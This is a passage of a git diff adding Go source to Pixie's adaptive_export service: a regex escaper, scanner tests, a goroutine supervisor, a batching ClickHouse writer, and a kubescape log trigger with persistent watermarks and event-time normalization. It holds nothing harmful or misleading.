k8s pod names +// are DNS-1123 (lowercase alphanumeric + hyphen) plus a "/" namespace +// separator — none of these are regex meta — but we escape defensively +// so a future rename rule that admits underscores or dots doesn't +// produce a silently-broken filter. +var regexEscaper = strings.NewReplacer( + `.`, `\.`, + `|`, `\|`, + `(`, `\(`, + `)`, `\)`, + `+`, `\+`, + `*`, `\*`, + `?`, `\?`, + `[`, `\[`, + `]`, `\]`, + `{`, `\{`, + `}`, `\}`, + `^`, `\^`, + `$`, `\$`, +) + +func escapeRegex(s string) string { + return regexEscaper.Replace(s) +} + +// Compile-time assert ActiveSet.Key is what we expect (the fmt import +// would be unused if Render changed). +var _ = fmt.Sprintf + +// Compile-time assert that activeset.Key.Render is the format used +// above (sanity for refactors). +var _ = (activeset.Key{}).Render diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go new file mode 100644 index 00000000000..0e5a6b9ac1f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go @@ -0,0 +1,242 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "errors" + "strings" + "sync" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// fakeQuerier captures PxL strings and returns a canned row set. +type fakeQuerier struct { + mu sync.Mutex + queries []string + rows []map[string]any +} + +func (f *fakeQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) { + f.mu.Lock() + f.queries = append(f.queries, pxl) + f.mu.Unlock() + return f.rows, nil +} + +// failingQuerier always returns err. +type failingQuerier struct { + err error + mu sync.Mutex + hits int +} + +func (f *failingQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) { + f.mu.Lock() + f.hits++ + f.mu.Unlock() + return nil, f.err +} + +// flipFlopQuerier alternates success / failure per call. +type flipFlopQuerier struct { + mu sync.Mutex + idx int + results [][]map[string]any + failures []bool +} + +func (f *flipFlopQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) { + f.mu.Lock() + defer f.mu.Unlock() + i := f.idx % len(f.failures) + f.idx++ + if f.failures[i] { + return nil, errors.New("simulated failure") + } + return f.results[i], nil +} + +// fakeWriter counts WritePixieRows invocations. +type fakeWriter struct { + count atomic.Int64 +} + +func (f *fakeWriter) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error { + f.count.Add(int64(len(rows))) + return nil +} + +func TestScanner_BuildsPxLWithAllowlistOR(t *testing.T) { + cfg := ScannerConfig{Table: "pgsql_events"}.defaulted() + s := &TableScanner{cfg: cfg} + f := Filter{ + Mode: FilterModeAllowlist, + Pods: []activeset.Key{ + {Namespace: "n1", Pod: "a"}, + {Namespace: "n2", Pod: "b"}, + }, + } + pxl := s.buildPxL(f) + if !strings.HasPrefix(pxl, "#px:set max_output_rows_per_table=1000000\n") { + t.Fatalf("pxl missing the #px:set cap flag (10k-cap fix); got:\n%s", pxl) + } + if !strings.Contains(pxl, "table='pgsql_events'") { + t.Fatalf("pxl missing table: %s", pxl) + } + if !strings.Contains(pxl, "n1/a") { + t.Fatalf("pxl missing first pod in regex: %s", pxl) + } + if !strings.Contains(pxl, "n2/b") { + t.Fatalf("pxl missing second pod in regex: %s", pxl) + } + if !strings.Contains(pxl, "px.regex_match") || !strings.Contains(pxl, "df.pod)") { + t.Fatalf("pxl missing px.regex_match call: %s", pxl) + } + if !strings.Contains(pxl, "^(") || !strings.Contains(pxl, ")$") { + t.Fatalf("pxl missing anchored alternation: %s", pxl) + } +} + +func TestScanner_UnfilteredModeOmitsAllowlist(t *testing.T) { + cfg := ScannerConfig{Table: "http_events"}.defaulted() + s := &TableScanner{cfg: cfg} + f := Filter{Mode: FilterModeUnfiltered} + pxl := s.buildPxL(f) + if strings.Contains(pxl, "df.pod ==") { + t.Fatalf("unfiltered mode should not emit pod filter: %s", pxl) + } +} + +func TestScanner_EmptyAllowlistSkipsQuery(t *testing.T) { + q := &fakeQuerier{rows: nil} + w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: time.Hour}) + filtCh := make(chan Filter, 4) + filtCh <- Filter{Mode: FilterModeAllowlist, Pods: nil} // empty + cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 100 * time.Millisecond} + sc := NewScanner(cfg, q, w, filtCh) + ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond) + defer cancel() + go w.Run(ctx) + sc.Run(ctx) + st := sc.Stats() + if st.Queries != 0 { + t.Fatalf("expected 0 queries on empty allowlist, got %d", st.Queries) + } + if st.Skipped == 0 { + t.Fatalf("expected skipped > 0") + } +} + +// TestScanner_BackoffOnRepeatedErrors — after a Query error, the +// scanner must back off (NOT hot-loop). After K consecutive +// failures, the per-retry interval must be ≥ a measurable threshold. +func TestScanner_BackoffOnRepeatedErrors(t *testing.T) { + q := &failingQuerier{err: errors.New("simulated broker outage")} + w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 50 * time.Millisecond}) + filtCh := make(chan Filter, 4) + filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}} + cfg := ScannerConfig{ + Table: "pgsql_events", + RefreshInterval: 100 * time.Second, // huge — backoff must dominate, not refresh + QueryTimeout: 100 * time.Millisecond, + BackoffInitial: 50 * time.Millisecond, + BackoffMax: 200 * time.Millisecond, + } + sc := NewScanner(cfg, q, w, filtCh) + ctx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + go w.Run(ctx) + sc.Run(ctx) + st := sc.Stats() + // In 1 second with backoff = 50/100/200/200 → expected attempts ≤ ~10. + // Without backoff (hot-loop), we'd see thousands. + if st.Errors > 20 { + t.Fatalf("scanner appears to be hot-looping on errors: %d in 1s (expected ≤ 20)", st.Errors) + } + if st.Errors < 2 { + t.Fatalf("scanner did not retry after error: %d (expected ≥ 2)", st.Errors) + } +} + +// TestScanner_BackoffResetsOnSuccess — once a query succeeds, the +// backoff state must reset so the next failure waits BackoffInitial +// (not BackoffMax). +func TestScanner_BackoffResetsOnSuccess(t *testing.T) { + q := &flipFlopQuerier{ + results: [][]map[string]any{ + nil, // first call fails + {{"x": 1}}, + nil, // third call fails again + }, + failures: []bool{true, false, true}, + } + w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 1 * time.Hour}) + filtCh := make(chan Filter, 4) + filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}} + cfg := ScannerConfig{ + Table: "pgsql_events", + RefreshInterval: 10 * time.Millisecond, + QueryTimeout: 100 * time.Millisecond, + BackoffInitial: 50 * time.Millisecond, + BackoffMax: 400 * time.Millisecond, + } + sc := NewScanner(cfg, q, w, filtCh) + ctx, cancel := context.WithTimeout(context.Background(), 250*time.Millisecond) + defer cancel() + go w.Run(ctx) + sc.Run(ctx) + st := sc.Stats() + // Without backoff reset, a stuck-at-Max scanner would hit fewer + // retries (waiting BackoffMax=400ms = 0 retries in 250ms after + // first error). With reset, success → 50ms → fail → 100ms etc. + // — more retries fit in the window. + // + // Concrete: after each "fail | success | fail | success ..." cycle, + // backoff stays at the initial value, so retries are FAST. We + // expect ≥ 3 queries and ≥ 2 errors in 250 ms. + if st.Queries < 3 { + t.Fatalf("scanner did fewer queries than expected; queries=%d errors=%d (backoff may not be resetting)", st.Queries, st.Errors) + } + if st.Errors < 2 { + t.Fatalf("expected ≥ 2 errors, got %d", st.Errors) + } +} + +func TestScanner_QueriesOnNonEmptyFilter(t *testing.T) { + q := &fakeQuerier{rows: []map[string]any{{"time_": time.Now(), "pod": "n/p"}}} + fw := &fakeWriter{} + w := NewBatchWriter("pgsql_events", fw, WriterConfig{BatchEvery: 50 * time.Millisecond}) + filtCh := make(chan Filter, 4) + filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}} + cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 50 * time.Millisecond, QueryTimeout: 1 * time.Second} + sc := NewScanner(cfg, q, w, filtCh) + ctx, cancel := context.WithTimeout(context.Background(), 300*time.Millisecond) + defer cancel() + go w.Run(ctx) + sc.Run(ctx) + if sc.Stats().Queries == 0 { + t.Fatalf("expected at least one query") + } + if fw.count.Load() == 0 { + t.Fatalf("writer received no rows; expected at least 1") + } +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/supervisor.go b/src/vizier/services/adaptive_export/internal/streaming/supervisor.go new file mode 100644 index 00000000000..8aca323aac2 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/supervisor.go @@ -0,0 +1,95 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "sync" + + log "github.com/sirupsen/logrus" +) + +// Supervisor owns the lifecycle of N TableScanner + N BatchWriter +// pairs (one pair per pixie table) plus the shared FilterUpdater. +// Single entry point from main.go. +// +// Goroutine inventory at steady state: +// +// 1 FilterUpdater +// N TableScanners (1 per pixie table) +// N BatchWriters (1 per pixie table) +// ────────────────── +// 1 + 2N total +// +// For N=10 (current PushPixieTables count): 21 goroutines, constant +// regardless of active hash count. +type Supervisor struct { + updater *FilterUpdater + scanners []*TableScanner + writers []*BatchWriter + tables []string + + wg sync.WaitGroup +} + +// NewSupervisor wires up scanners + writers for the given table list. +// One scanner + one writer per table. Each scanner gets its own +// channel from the updater. +func NewSupervisor( + updater *FilterUpdater, + querier Querier, + sink SinkWriter, + tables []string, + scannerCfg ScannerConfig, + writerCfg WriterConfig, +) *Supervisor { + s := &Supervisor{ + updater: updater, + tables: tables, + } + for _, t := range tables { + w := NewBatchWriter(t, sink, writerCfg) + c := scannerCfg + c.Table = t + sc := NewScanner(c, querier, w, updater.Subscribe()) + s.scanners = append(s.scanners, sc) + s.writers = append(s.writers, w) + } + return s +} + +// Run starts FilterUpdater + every scanner + every writer. +// Blocks until ctx is cancelled, at which point all goroutines +// drain and Run returns. +func (s *Supervisor) Run(ctx context.Context) { + log.WithFields(log.Fields{ + "tables": len(s.tables), + "goroutines": 1 + 2*len(s.tables), + }).Info("streaming.Supervisor: starting rev-3 push flow") + + s.wg.Add(1) + go func() { defer s.wg.Done(); s.updater.Run(ctx) }() + + for i := range s.scanners { + sc := s.scanners[i] + w := s.writers[i] + s.wg.Add(2) + go func() { defer s.wg.Done(); w.Run(ctx) }() + go func() { defer s.wg.Done(); sc.Run(ctx) }() + } + s.wg.Wait() +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/writer.go b/src/vizier/services/adaptive_export/internal/streaming/writer.go new file mode 100644 index 00000000000..313ab1ae4cf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/writer.go @@ -0,0 +1,154 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "time" + + log "github.com/sirupsen/logrus" +) + +// SinkWriter is the abstraction over sink.WritePixieRows. Defining +// it here avoids a sink package import cycle and lets tests inject +// fakes. +type SinkWriter interface { + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// BatchWriter buffers per-table pixie rows and flushes them as one +// CH INSERT either when the buffer hits BatchRows OR when BatchEvery +// elapses since the last successful flush, whichever comes first. +// One goroutine per BatchWriter. +// +// Why batching: rev-2's per-hash fan-out produced ~10 small INSERTs +// per pass per pod. CH handles small INSERTs poorly (each spawns a +// merge; merge throughput is the bottleneck on heavily-active +// tables). One larger INSERT per N seconds dramatically reduces +// merge pressure. +type BatchWriter struct { + table string + sink SinkWriter + in chan []map[string]any + batchRows int + batchEvery time.Duration + bufferCap int +} + +// WriterConfig tunes a BatchWriter. Zero → defaults. +type WriterConfig struct { + BatchRows int // flush when buffered ≥ this many rows. default 10000. + BatchEvery time.Duration // flush when this much time has elapsed. default 5 s. + BufferCap int // input chan capacity (rows-of-batches). default 64. +} + +func (c WriterConfig) defaulted() WriterConfig { + if c.BatchRows <= 0 { + c.BatchRows = 10000 + } + if c.BatchEvery <= 0 { + c.BatchEvery = 5 * time.Second + } + if c.BufferCap <= 0 { + c.BufferCap = 64 + } + return c +} + +// NewBatchWriter constructs but does not start the writer. +func NewBatchWriter(table string, sink SinkWriter, cfg WriterConfig) *BatchWriter { + cfg = cfg.defaulted() + return &BatchWriter{ + table: table, + sink: sink, + in: make(chan []map[string]any, cfg.BufferCap), + batchRows: cfg.BatchRows, + batchEvery: cfg.BatchEvery, + bufferCap: cfg.BufferCap, + } +} + +// Submit hands rows to the writer. Non-blocking — if the input chan +// is full, the rows are DROPPED (oldest semantics handled at the +// table-scanner level; per-call drop here is the simpler contract). +// Returns true if accepted, false if dropped. Caller can log on drop. +func (w *BatchWriter) Submit(rows []map[string]any) bool { + if len(rows) == 0 { + return true + } + select { + case w.in <- rows: + return true + default: + log.WithFields(log.Fields{ + "table": w.table, + "rows": len(rows), + }).Warn("streaming.BatchWriter: input chan full, dropping batch") + return false + } +} + +// Run owns the BatchWriter goroutine. Returns when ctx is cancelled, +// after attempting a best-effort final flush. +func (w *BatchWriter) Run(ctx context.Context) { + var buf []map[string]any + ticker := time.NewTicker(w.batchEvery) + defer ticker.Stop() + + flush := func(reason string) { + if len(buf) == 0 { + return + } + // Bound the CH write so a stalled CH HTTP doesn't pin us. + fctx, cancel := context.WithTimeout(ctx, 60*time.Second) + err := w.sink.WritePixieRows(fctx, w.table, buf) + cancel() + if err != nil { + log.WithError(err).WithFields(log.Fields{ + "table": w.table, + "rows": len(buf), + "reason": reason, + }).Warn("streaming.BatchWriter: flush failed") + } else { + log.WithFields(log.Fields{ + "table": w.table, + "rows": len(buf), + "reason": reason, + }).Info("streaming.BatchWriter: flushed batch") + } + buf = buf[:0] + } + + for { + select { + case <-ctx.Done(): + flush("shutdown") + return + + case rows := <-w.in: + buf = append(buf, rows...) + if len(buf) >= w.batchRows { + flush("size") + // Reset ticker so we don't get a redundant flush 100ms later + ticker.Reset(w.batchEvery) + } + + case <-ticker.C: + flush("timer") + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel new file mode 100644 index 00000000000..367e6acc1f0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel @@ -0,0 +1,45 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "trigger", + srcs = [ + "clickhouse.go", + "watermark.go", + ], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/chhttp", + "//src/vizier/services/adaptive_export/internal/kubescape", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "trigger_test", + srcs = [ + "clickhouse_internal_test.go", + "clickhouse_test.go", + "fingerprint_bench_test.go", + "watermark_test.go", + ], + embed = [":trigger"], + deps = ["//src/vizier/services/adaptive_export/internal/kubescape"], +) diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go new file mode 100644 index 00000000000..63fbcd2a793 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go @@ -0,0 +1,498 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package trigger watches forensic_db.kubescape_logs for new rows and +// pushes parsed kubescape.Event values onto a channel. Polls the +// ClickHouse HTTP interface (default 250ms cadence). Operator runs as +// a DaemonSet — each instance polls only its OWN node's rows via +// `WHERE hostname = ''`. +package trigger + +import ( + "bufio" + "bytes" + "context" + "crypto/sha256" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "regexp" + "strconv" + "strings" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" +) + +// Config configures the trigger. PollInterval defaults to 250ms. +// Hostname is REQUIRED — it scopes every poll to a single node. +type Config struct { + Endpoint string + Database string + Table string + Username string + Password string + Hostname string + PollInterval time.Duration + + // InitialWatermark is a fallback used ONLY when Watermark is nil + // AND the persistent store is also empty. The production wiring + // always supplies Watermark and leaves this zero. + InitialWatermark uint64 + + // Watermark, when non-nil, makes the trigger persistent across + // restarts: the first poll loads from the store; successful + // advances are saved back (throttled by WatermarkSaveInterval). + // nil → behaves like pre-watermark trigger (in-memory only, + // starts from InitialWatermark; previously the source of the + // "infinite full-table replay after OOM" bug). + Watermark WatermarkStore + + // WatermarkSaveInterval throttles persistent writes — we'd + // otherwise INSERT every 250ms on a busy node. Default 5s. + WatermarkSaveInterval time.Duration + + // PollLimit caps rows returned per poll. Bounds catch-up work + // after a restart so a 10h backlog doesn't translate into a + // single multi-GiB SELECT the HTTP client times out on; instead + // it drains in N polls of PollLimit rows. Default 10000. + // 0 → unlimited (legacy behavior — NOT recommended in prod). + PollLimit int + + // HTTPTimeout bounds each individual poll. Default 30s; previously + // hardcoded to 5s, which under any backlog caused every poll to + // time out mid-stream → watermark never advanced. + HTTPTimeout time.Duration +} + +// ClickHouseHTTP polls forensic_db.
over the ClickHouse HTTP +// interface, scoped to a single node. +type ClickHouseHTTP struct { + cfg Config + client *http.Client +} + +// New validates Config and returns a ready trigger. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Endpoint == "" { + return nil, fmt.Errorf("trigger: empty Endpoint") + } + if cfg.Hostname == "" { + return nil, fmt.Errorf("trigger: empty Hostname (operator must run node-local)") + } + u, err := url.Parse(cfg.Endpoint) + if err != nil { + return nil, fmt.Errorf("trigger: invalid Endpoint %q: %w", cfg.Endpoint, err) + } + if u.Scheme != "http" && u.Scheme != "https" { + return nil, fmt.Errorf("trigger: Endpoint %q must use http or https scheme", cfg.Endpoint) + } + if u.Host == "" { + return nil, fmt.Errorf("trigger: Endpoint %q has empty host", cfg.Endpoint) + } + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + if cfg.Table == "" { + cfg.Table = "kubescape_logs" + } + // Validate Database / Table as plain ClickHouse identifiers + // (alphanumeric + underscore, not starting with a digit) so the + // SELECT in fetchSince cannot be subverted by an attacker-controlled + // Config. Hostname is value-quoted via quoteCH; identifiers cannot + // be parameterised, hence validation here. + if !validIdentifier(cfg.Database) { + return nil, fmt.Errorf("trigger: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + if !validIdentifier(cfg.Table) { + return nil, fmt.Errorf("trigger: invalid Table identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Table) + } + if cfg.PollInterval <= 0 { + cfg.PollInterval = 250 * time.Millisecond + } + if cfg.WatermarkSaveInterval <= 0 { + cfg.WatermarkSaveInterval = 5 * time.Second + } + if cfg.PollLimit < 0 { + return nil, fmt.Errorf("trigger: PollLimit must be >= 0 (got %d)", cfg.PollLimit) + } + if cfg.PollLimit == 0 { + cfg.PollLimit = 10000 + } + if cfg.HTTPTimeout <= 0 { + cfg.HTTPTimeout = 30 * time.Second + } + return &ClickHouseHTTP{ + cfg: cfg, + client: &http.Client{Timeout: cfg.HTTPTimeout}, + }, nil +} + +// identifierRE accepts plain ClickHouse identifiers — letters, digits, +// underscores; not starting with a digit. Dotted identifiers (e.g. +// "http2_messages.beta") are deliberately rejected here because the +// trigger only ever queries the kubescape ingest table, not a pixie +// observation table. +var identifierRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validIdentifier(s string) bool { return identifierRE.MatchString(s) } + +// Subscribe starts the background poll loop. The returned channel +// produces kubescape.Event values until ctx is cancelled, then closes. +func (t *ClickHouseHTTP) Subscribe(ctx context.Context) (<-chan kubescape.Event, error) { + out := make(chan kubescape.Event, 64) + go t.run(ctx, out) + return out, nil +} + +func (t *ClickHouseHTTP) run(ctx context.Context, out chan<- kubescape.Event) { + defer close(out) + // Watermark uses event_time as the cursor PLUS a set of row + // fingerprints already pushed at that exact event_time. This + // closes the race where two kubescape rows share the same + // event_time but the second arrives after our previous poll: the + // query is `event_time >= watermark` (inclusive) and we skip rows + // whose fingerprint we have already seen at the boundary. + // + // Cold-start order: persistent store > InitialWatermark > 0. + // The persistent store is the production answer to "operator + // OOMed, restarts, replays 10h of kubescape_logs from 0, every + // poll times out, never recovers" — without it any restart on + // a busy node is permanently stuck. + watermark := t.cfg.InitialWatermark + if t.cfg.Watermark != nil { + // Bound the load with its own context so a flaky CH doesn't + // block start-up indefinitely. The trigger then falls back + // to InitialWatermark and we log the failure loudly. + loadCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout) + wm, ok, err := t.cfg.Watermark.Load(loadCtx, t.cfg.Hostname, t.cfg.Table) + cancel() + switch { + case err != nil: + log.WithError(err).Warn("trigger: persistent watermark load failed; using InitialWatermark") + case ok: + watermark = wm + log.WithField("watermark", wm).Info("trigger: resumed from persistent watermark") + default: + log.WithField("initial", t.cfg.InitialWatermark). + Info("trigger: no persistent watermark; using InitialWatermark") + } + } + // Cursor is canonical NANOS (F8). Normalize whatever we loaded so a + // pre-fix persisted seconds watermark (or a non-seconds InitialWatermark) + // is interpreted on the same scale as chNormEventTimeNanos in the SQL. + watermark = normalizeEventTimeNanos(watermark) + seenAtBoundary := map[string]bool{} + ticker := time.NewTicker(t.cfg.PollInterval) + defer ticker.Stop() + + // Throttle persistent writes: every successful advance is in + // memory immediately, but only flushed to CH at most every + // WatermarkSaveInterval. dirty tracks whether the in-memory + // watermark differs from what was last persisted. + // + // The flush is invoked INSIDE pollOnce (not from a ticker case + // in the for/select), because the initial pollOnce on a busy + // node can block for tens of seconds while it drains 10k events + // down a back-pressured channel — during which time the for/ + // select isn't running and a saveTicker.C tick would never be + // observed. Throttling is done with a time.Time comparison. + lastSaved := watermark + var lastSaveTime time.Time + dirty := false + flushWatermark := func() { + if !dirty || t.cfg.Watermark == nil || watermark == lastSaved { + return + } + if !lastSaveTime.IsZero() && time.Since(lastSaveTime) < t.cfg.WatermarkSaveInterval { + return + } + saveCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout) + err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark) + cancel() + if err != nil { + log.WithError(err).WithField("watermark", watermark). + Warn("trigger: persistent watermark save failed; will retry next interval") + return + } + lastSaved = watermark + lastSaveTime = time.Now() + dirty = false + } + // Best-effort final flush so a clean shutdown doesn't lose up + // to WatermarkSaveInterval of progress. + defer func() { + if t.cfg.Watermark != nil && dirty { + saveCtx, cancel := context.WithTimeout(context.Background(), t.cfg.HTTPTimeout) + defer cancel() + if err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark); err != nil { + log.WithError(err).Warn("trigger: shutdown watermark save failed") + } + } + }() + + pollOnce := func() { + rows, maxSeen, err := t.fetchSince(ctx, watermark) + // Partial-read tolerance: when the body read is cut short by + // HTTP timeout / connection reset, fetchSince returns the rows + // it managed to parse + err. We still process those rows so + // the watermark advances by what we got; failing to do so was + // the second half of the "stuck forever" bug. + if err != nil { + if len(rows) == 0 { + log.WithError(err).Warn("trigger: poll failed") + return + } + log.WithError(err).WithField("partial_rows", len(rows)). + Warn("trigger: poll partial — advancing on what parsed") + } + nextSeen := map[string]bool{} + // Periodic in-loop save: when pollOnce is draining a large + // initial backlog, the watermark advances long before the + // loop exits. Calling flushWatermark every N rows means the + // persistent watermark catches up even mid-drain, so a crash + // during the drain doesn't replay the whole backlog. Combined + // with the time-based throttle inside flushWatermark, this + // produces at most one persistent INSERT per WatermarkSaveInterval. + const saveEveryN = 256 + skippedAtBoundary := 0 + for i, row := range rows { + fp := rowFingerprint(row) + // Cursor comparisons are in NORMALIZED nanos (F8): the raw + // event_time unit is not enforced, so compare on the same scale + // as the SQL filter (chNormEventTimeNanos) and maxSeen. + evn := normalizeEventTimeNanos(row.EventTime) + if evn == watermark && seenAtBoundary[fp] { + skippedAtBoundary++ + continue // already pushed in a prior poll at this exact boundary + } + ev, err := kubescape.Extract(row) + if err != nil { + log.WithError(err).Debug("trigger: skip incomplete row") + continue + } + // Promote the per-row (normalized) event_time into the watermark + // immediately so flushWatermark below can persist mid-drain. + if evn > watermark { + watermark = evn + dirty = true + } + select { + case out <- ev: + case <-ctx.Done(): + return + } + if evn == maxSeen { + nextSeen[fp] = true + } + if i > 0 && i%saveEveryN == 0 { + flushWatermark() + } + } + if maxSeen > watermark { + watermark = maxSeen + seenAtBoundary = nextSeen + dirty = true + } else if maxSeen == watermark { + // no progress this tick — preserve boundary set, optionally extend + for fp := range nextSeen { + seenAtBoundary[fp] = true + } + // Paging escape: if every row returned was a boundary-skip AND + // the response was at PollLimit capacity, there may be additional + // rows at the same normalized event_time that we will never reach + // (the SQL ORDER BY has no secondary key, so LIMIT always returns + // the same PollLimit rows from the boundary). Advance the watermark + // by 1 nanosecond to escape the boundary. In practice this means + // at most one nanosecond's worth of events are not re-delivered on + // the next poll, which is acceptable: the fingerprint dedup already + // tolerates boundary overlap, and we prefer forward progress over + // an infinite loop. + if skippedAtBoundary > 0 && len(nextSeen) == 0 && len(rows) >= t.cfg.PollLimit { + watermark++ + seenAtBoundary = map[string]bool{} + dirty = true + log.WithField("watermark", watermark). + Warn("trigger: boundary paging escape — advanced watermark by 1ns to unblock poll") + } + } + // Final flush at end of pollOnce — also throttled. + flushWatermark() + } + + pollOnce() + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + pollOnce() + } + } +} + +// rowFingerprint hashes the row's content so we can dedupe at the +// watermark boundary without trusting kubescape to give us a unique row id. +func rowFingerprint(r kubescape.Row) string { + h := sha256.New() + _, _ = fmt.Fprintf(h, "%d\x00%s\x00%s\x00%s\x00%s", + r.EventTime, r.RuleID, r.Hostname, r.K8sDetails, r.ProcessDetails) + return hex.EncodeToString(h.Sum(nil)) +} + +// normalizeEventTimeNanos maps a raw kubescape event_time (UInt64, whose unit +// the pipeline does not enforce) to canonical UNIX NANOSECONDS using the same +// magnitude thresholds as controller.eventTimeToTime. This is the fix for the +// watermark-poison bug (FINDINGS_AND_BACKLOG F8): the trigger's cursor is a +// monotonic high-water-mark, so without a single canonical unit a stray row in +// a larger unit (e.g. one nanos row, ~1.78e18) drives the watermark past every +// real seconds row (~1.78e9) and AE silently stops processing forever. The +// cursor + the SQL filter both operate on the normalized value so units are +// always comparable. +func normalizeEventTimeNanos(et uint64) uint64 { + switch { + case et < 1e10: + return et * 1_000_000_000 // seconds → nanos + case et < 1e13: + return et * 1_000_000 // millis → nanos + default: + return et // already nanos + } +} + +// chNormEventTimeNanos is the ClickHouse expression equivalent of +// normalizeEventTimeNanos — used in the trigger SELECT so the >= watermark +// filter and ORDER BY are unit-agnostic server-side. (UInt64 headroom: the +// largest pre-normalization input that hits the *1e9 branch is <1e10, so the +// product is <1e19 < 2^64.) +const chNormEventTimeNanos = "multiIf(event_time < 10000000000, event_time * 1000000000, " + + "event_time < 10000000000000, event_time * 1000000, event_time)" + +func (t *ClickHouseHTTP) fetchSince(ctx context.Context, watermark uint64) ([]kubescape.Row, uint64, error) { + q := url.Values{} + // LIMIT bounds per-poll work. ORDER BY event_time + LIMIT N means + // catch-up from a stale watermark drains in ceil(backlog/N) polls + // of small responses instead of one giant scan. Without this, an + // operator that restarted into a multi-hour backlog could never + // recover — every unbounded query exceeded HTTPTimeout. + // Filter + order on the NORMALIZED (nanos) event_time so the watermark + // cursor is unit-agnostic (F8 fix). watermark is already in nanos. + q.Set("query", fmt.Sprintf( + 